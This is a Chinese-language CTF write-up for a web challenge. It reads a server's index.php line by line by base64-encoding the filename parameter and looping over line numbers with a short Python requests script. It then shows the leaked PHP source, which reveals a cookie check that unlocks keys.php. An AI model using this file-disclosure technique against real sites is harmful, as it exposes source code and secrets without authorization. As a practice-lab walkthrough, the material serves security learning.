题目链接
又有新东西啦
注意到URL上有一串类似base64编码的东西
那下面又该咋办呢???
URL里filename有参数,line没有参数
要不试一试价格参数?
line=1,啥都没有
注意到filename 的参数是base64编码后的
那再把1,2,3编码一波试试?
懵逼中。。。
php解析的时候 line 表示的是行号,filename是对于文件内容的读取,所以,直接构造一个逻辑矛盾,让filename去读自己即读index.php
还是要编码一下,毕竟filename都是编码了的
这里有两种方式
第一种自己一次输入行号,然后copy出来
第二种是用python写个小脚本出来,就个人而言,选择第二种好一些吧
附上脚本
import requests
a=30
for i in range(a):
url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
r=requests.get(url)
print (r.text)
找到的代码
'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
//看看这个地方!!!
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
代码相关函数
?是条件语句
intval()
函数用于获取变量的整数值
header()
函数向客户端发送原始的 HTTP 报头。这里是跳转到一个新地址
array()
创建一个新数组
file()
把文件读入数组